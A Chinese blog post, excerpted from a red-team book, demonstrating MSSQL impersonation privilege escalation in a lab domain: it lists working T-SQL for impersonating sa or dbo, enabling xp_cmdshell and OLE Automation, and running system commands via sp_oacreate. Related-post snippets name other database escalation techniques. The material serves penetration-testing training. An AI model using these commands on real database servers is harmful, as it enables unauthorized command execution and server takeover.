利用MSSQL模拟提权

于 2024-06-19 17:12:29 发布
阅读量285 收藏 3
点赞数 4
文章标签: sqlserver oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/139818577
版权

点击星标,即时接收最新推文

577e2c84e412a2a6a06695e682df3807.png

本文选自《内网安全攻防:红队之路》

扫描二维码五折购书

利用MSSQL模拟提权

在MS SQL数据库,可以使用EXECUTE AS语句,以其他用户的上下文执行SQL查询。需要注意的是只有明确授予模拟(Impersonate)权限的用户才能执行这个语句。这个权限对于多数用户不是默认配置,但是数据库管理员可能因为误配置导致权限提升。

这里为了演示利用MSSQL模拟提权的概念,我们在运行在dev-DC01的SQL数据库引入了一个误配置的模拟权限。有两种方式可以使用模拟。第一种方式是使用EXECUTE AS LOGIN语句在登录级别模拟不同的用户。第二种方式是在用户级别用EXECUTE AS USER语句来完成。

首先我们演示在登录级别的模拟。由于我们是低权限用户,我们无法枚举当前用户可以模拟哪个用户,但是可以枚举哪个用户可以被模拟。可通过如下查询获得哪个用户可以被模拟的信息:

set instance dev-dc01.dev.ms08067.cn
USE master;
go
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
go

2b18ecdc8b966274a613380ffa916492.png

枚举可被模拟的用户

从ESC工具的输出可以看到sa用户可被模拟,虽然无法判断哪个用户允许模拟成sa。在测试过程,可以使用我们有权限的用户直接尝试。我们首先使用EXECUTE AS LOGIN进行测试:   

set instance dev-dc01.dev.ms08067.cn
SELECT SYSTEM_USER;
go
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER;
go

15a2be57554700b56983b6f057727982.png

EXECUTE AS LOGIN模拟测试

从输出可以看到我们当前用户dev\dave可以模拟成sa,也就意味着当前用户有数据库管理员权限。

我们也可以模拟一个数据库用户,但是要进行权限提升,需要满足两个条件。首先模拟的其他用户需要有必要的权限,比如sysadmin角色。此外,因为数据库用户只能在特定数据库执行操作,要实现入侵数据库服务器,我们要模拟的用户需要在对应数据库设置了TRUSTWORTHY属性。仅原生的数据库msdb启用了这个属性。

要演示这个权限提升技术,guest用户必须在msdb授予模拟dbo的权限。

要执行模拟测试,首先切换到msdb数据,然后执行"EXECUTE AS USER"语句。通过USER_NAME()可以看到当前用户的上下文:

use msdb;
EXECUTE AS USER = 'dbo';
SELECT USER_NAME();
go

2b503a610baee82ae868d20790d58c41.png

EXECUTE AS USER模拟

从输出可以看到,当前用户也有权限模拟成dbo用户,也就是获得了sysadmin权限。

在我们获得了sysadmin权限后,可以尝试在数据库服务器执行命令。比较常用的方法是使用xp_cmdshell存储过程。但是因为xp_cmdshell比较常用,所以可能被禁用或者监控,此时,我们也可以尝试使用其他的存储过程,比如sp_OACreate。

我们先尝试使用xp_cmdshell执行命令。从SQL 2005开始,xp_cmdshell默认被禁用。如果有sysadmin角色权限的话,可以使用advanced options和sp_configure存储过程启用。我们先模拟sa,然后使用sp_configure激活advanced options并启用xp_cmdshell:

EXECUTE AS LOGIN = 'sa';
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell whoami
go

098e780470aaf06381e62771c0afdefd.png

启用xp_cmdshell

从输出可以看到成功在数据库服务器启用xp_cmdshell并执行了命令。后续如果想要执行其他命令,需要先执行EXECUTE AS LOGIN = 'sa':

746cf3d1869788a3d577fcbf3c818995.png

xp_cmdshell执行命令

如果要禁用xp_cmdshell,可用如下命令:

EXEC sp_configure 'xp_cmdshell', 0
RECONFIGURE
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

如果xp_cmdshell不可用,我们也可以使用sp_OACreate和sp_OAMethod存储过程,来创建和执行一个基于Object Linking and Embedding(OLE)的新存储过程。需要注意的是这个方法的命令执行结果不会回显。

在执行OLE-based存储过程前,我们需要确保"OLE Automation Procedures"设置启用,默认是禁用的,我们可以使用sp_configure修改这个设置。

EXECUTE AS LOGIN = 'sa';
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;
DECLARE @myshell INT;
EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT;
EXEC sp_oamethod @myshell, 'run', null, 'cmd /c ipconfig > c:\Tools\ip.txt';
go

566ba50788a1800824e6846c61f287eb.png

sp_OACreate命令执行

命令执行完后,我们在服务器查看,可以看到在数据库服务器成功执行ipconfig:

315fc883c75e555205c2f779d7e46132.png

sp_OACreate命令执行结果

—  实验室旗下直播培训课程  —

a0e80d8ecc3a27343a1db869fa40e6cf.png

0b5219adc07d721ad549da0c3a750f76.jpeg

52b095b12abba3cbc7b68c4b7fdd08f9.jpeg065a899eeadda39089975aeb335f7fb1.png

af80d2292391b7cedaf900b3181e9e69.png

09a73401f558df11f0847a0becf45e6c.jpeg

7494513b97f203c26c6ef58114979566.jpeg

2a97825e6de69b17ec11f622bcd59d7b.jpeg

fe1194b9d83895aaa0c81b0ed7b3e5ad.png

和20000+位同学加入MS08067一起学习

e7de184e13a1b5f5ca9c8ad1f843369b.gif

Ms08067安全实验室
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL提权总结(建议收藏)
xj28555的博客
09-08 702
原文地址:https://www.cnblogs.com/sfsec/p/15241860.html 前言 数据库权限 在平常的渗透提权中,我们通常可以在一些特殊情况下得到数据库的用户名和密码(最高权限root),如下: MySQL 3306 端口弱口令爆破 sqlmap 注入的 --sql-shell 模式 网站的数据库配置文件中拿到明文密码信息 CVE-2012-2122 等这类漏洞直接拿下 MySQL 权限 口令爆破、sqlmap的--sql-shell模式和数据库配置文件中拿明文密码已经
mysql服务攻击检测_【渗透测试要点】MySQL攻击面和提权总结
weixin_34980267的博客
01-27 568
原标题:【渗透测试要点】MySQL攻击面和提权总结本次实验使用腾讯云主机的MySQL Server作为服务端,阿里云主机作为MySQL客户端。其中均使用宝塔面板搭建MySQL8.0版本。首先要开放腾讯云主机的端口,并且允许MySQL Server允许任意用户远程登录。1攻击面——MySQL客户端任意文件读取适用范围:全版本 MySQL/MariaDB Client条件:客户端连接时开启 –enab...
phpmyadmin mysql提权_phpMyadmin提权那些事
weixin_34638282的博客
01-20 200
phpMyadmin提权那些事引言:在渗透测试过程中获知到phpMyadmin的账号密码,如何进行提权呢?往下看,我今天和你说说phpMyadmin提权那些事。0×00 定义​ phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL数据库管理工具,让管理者可用Web接口管理MySQL数据库。0×01 环境准备目标: Windows Serve...
常见的Windows提权方法
weixin_48968378的博客
12-14 3770
目录 1、无引号提权路径(Trusted Service Paths) 2、易受到攻击的服务(Vulnerable Services) 3、AlwaysInstallElevated(始终安装高架) 4、信息泄露 5、基于资源的域约束性委派利用 6、POTATO家族 7、MySQL下的提权技术 MOF提权 UDF提权 启动项提权 8、命令管道提权 9、令牌窃取 10、常见Windows的提权CVE 1、无引号提权路径(Trusted Service Paths) 原理:利用.
Windows系统常见提权方式
m0_64481831的博客
03-26 1177
提权依然要查看一些条件,最简单的办法就是直接尝试提权,能成功就成功,因为现实的环境都是很复杂的。
Windows提权
buffedon的博客
07-05 972
Windows提权一. Windows 域、权限、用户windows域中存在的对象:域的理解:权限与用户二. windows提权1. 内核溢出漏洞提权查看漏洞是否有补丁2. 系统配置错误提权(1)系统服务权限配置错误(2)注册表键AlwayslnstallElevated(3)可信任服务路径漏洞(4)自动安装配置文件(5) 计划任务3. 组策略首选项提权组策略首选项提权分析利用方式防御措施4. 绕过UAC提权利用方式防御措施5. 令牌窃取利用方式防御其他Windows提权方式 一. Windows 域、权限
【内网安全】——数据库提权姿势
Demo不是emo的博客
02-10 2349
数据库提权姿势汇总
2008 r2 server 提权_某次Windows渗透提权过程
weixin_39624071的博客
12-19 1582
0x01物色目标大多数站点出于安全考虑,都会在robots.txt文件中屏蔽掉搜索引擎对敏感路径页面的爬取。robots文件里的敏感路径在针对一个目标渗透时可以帮助我们识别出重要页面,但它的存在不利于自动化工具的批量采集,所以Censys、Shodan、Zoomeye就不会那么灵敏了。 首先在Censys中利用敏感路经找到了一堆服务器,挑了几个看起来顺眼的利用某代码执行漏洞写入WebShell ...
Windows提权!!!
huohaowen的博客
03-31 944
怒肝一万多字
windows提权总结
weixin_68652890的博客
04-05 4810
windows提权总结 文章目录溢出漏洞提权at&sc&ps命令提权数据库提权mysqlUDF提权MOF提权启动项提权sql serverxp_cmdshell提权sp_oacreate提权令牌窃取提权RottenPotato(烂土豆)配合令牌窃取DLL劫持提权不带引号的服务路径配合msf提权不安全的服务权限配合MSF提权其他方法 溢出漏洞提权 拿到服务器普通权限→上传溢出程序→提权至administrator。 内核溢出漏洞总结:https://github.com/SecWiki/win
Linux利用UDF库实现Mysql提权
09-10
本篇将详细介绍如何利用UDF库来实现MySQL提权操作。 首先,提权通常涉及到获取更高的系统权限,而在MySQL中,通过UDF库可以执行系统级别的命令,从而可能达到提升权限的目的。要实现这一过程,我们需要满足以下...
Mysql 权限提权实例教程.doc
01-03
Mysql权限提取实例教程, 利用mysql提权的前提就是,服务器安装了mysql,mysql的服务没有降权,(降权也可以提,没降权的话就最好了),是默认安装以系统权限继承的(system权限). 并且获得了root的账号密码
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
必备神器->MYSQL高版本提权工具-V 2011
01-19
必备神器->MYSQL高版本提权工具-V 2011
mysql提权工具
04-24
mysql自动提权工具,。。。。。。。。。。。。。。。。。。。。。。。
PostgreSQL源码分析——CREATE DATABASE
让我思考一下
06-18 615
这里我们分析一下在PostgreSQL中创建数据库的源码,在分析源码之前,最好先阅读《PostgreSQL指南内幕探索》的第一章,数据库集簇、数据库和数据表,弄清其空间布局,理解PG中,数据库、表、元组是怎么布局的。通俗一点说,创建一个数据库相当于创建一个数据目录,在这个目录下,存放该数据库中定义的表、索引等对象。
oracle中执行select ... for update需要什么权限?
lee_vincent1的博客
06-15 859
1、只需要select权限就能执行select…for update (不能提交修改,但会锁表),所以这里可能会被坑。2、完整执行select…for update 需要select+update 权限。
【无标题】
最新发布
2302_79119987的博客
06-18 1017
输入单引号:观察是否有错误信息,初步判断是否存在SQL注入。测试简单的布尔条件:如和,判断是否有响应变化。尝试联合查询:如,查看是否返回额外数据。使用时间盲注:如,通过响应时间判断是否存在注入。
Oracle Database 23ai 创建新用户
engchina的专栏
06-18 374
Oracle Database 23ai 创建新用户
mysql udf 提权
03-06
MySQL UDF(User-Defined Function)是MySQL中的用户自定义函数,它允许用户通过编写自己的函数来扩展MySQL的功能。UDF可以用于实现各种自定义功能,包括提权提权是指通过某种方式获取更高权限的操作。在MySQL中,如果你拥有一个低权限的账户,但是想要执行高权限操作,可以通过UDF提权来实现。 具体来说,你可以编写一个UDF函数,该函数可以执行一些需要高权限才能执行的操作,比如修改系统文件、执行系统命令等。然后将该UDF函数加载到MySQL中,并使用低权限账户调用该函数,从而实现提权操作。 需要注意的是,UDF提权需要满足以下条件: 1. 你需要有CREATE FUNCTION权限,以创建和加载UDF函数。 2. 你需要找到一个合适的提权方法,并编写相应的UDF函数。 3. 你需要知道目标MySQL服务器的版本和配置,以确保你选择的提权方法适用于该版本和配置。 请注意,提权是一种潜在的安全风险行为,应该谨慎使用,并且仅在合法授权的情况下进行。滥用提权功能可能导致系统被攻击或数据泄露等安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值